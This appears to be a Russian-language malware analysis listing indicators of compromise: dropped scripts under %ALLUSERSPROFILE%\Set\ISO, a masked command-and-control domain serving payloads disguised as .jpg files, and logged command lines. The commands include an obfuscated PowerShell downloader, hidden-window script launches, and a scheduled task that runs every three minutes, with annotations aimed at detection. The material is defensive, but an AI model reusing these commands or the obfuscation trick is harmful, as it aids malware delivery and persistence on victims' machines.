Техническая информация
- <SYSTEM32>\tasks\set
- %ALLUSERSPROFILE%\set\iso\class.ps1
- %ALLUSERSPROFILE%\set\iso\xx.bat
- %ALLUSERSPROFILE%\set\iso\set.vbs
- %ALLUSERSPROFILE%\set\iso\set.bat
- %ALLUSERSPROFILE%\set\iso\xx.vbs
- 'sh#####ttracking.net':80
- http://sh#####ttracking.net//wp-content/uploads/SSL/xx.jpg
- http://sh#####ttracking.net//wp-content/uploads/SSL/error.jpg
- DNS ASK sh#####ttracking.net
- '<SYSTEM32>\wscript.exe' "%ALLUSERSPROFILE%\Set\ISO\xx.vbs"
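- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command [void] [System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'Dow__lo--tri__g'.repla...' (со скрытым окном; командная строка в отчёте обрезана. Имя метода Net.WebClient, вызываемого через CallByname, замаскировано вставками «__» и «--», которые, по-видимому, заменяются вызовом .repla… во время выполнения, поэтому поиск по открытому имени метода эту строку не найдёт — при детектировании надёжнее опираться на сочетание CallByname и Net.WebClient в командной строке powershell.exe)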
- '<SYSTEM32>\cmd.exe' /c ""%ALLUSERSPROFILE%\Set\ISO\xx.bat" "' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command [void] [System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'Dow__lo--tri__g'.repla...
- '<SYSTEM32>\cmd.exe' /c ""%ALLUSERSPROFILE%\Set\ISO\xx.bat" "
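- '<SYSTEM32>\schtasks.exe' /create /tn Set /sc minute /mo 3 /tr "%ALLUSERSPROFILE%\Set\ISO\Set.vbs" (создаёт задачу планировщика с именем Set, которая каждые 3 минуты запускает Set.vbs, — механизм закрепления в системе; этой задаче, по-видимому, соответствует файл <SYSTEM32>\tasks\set из списка выше)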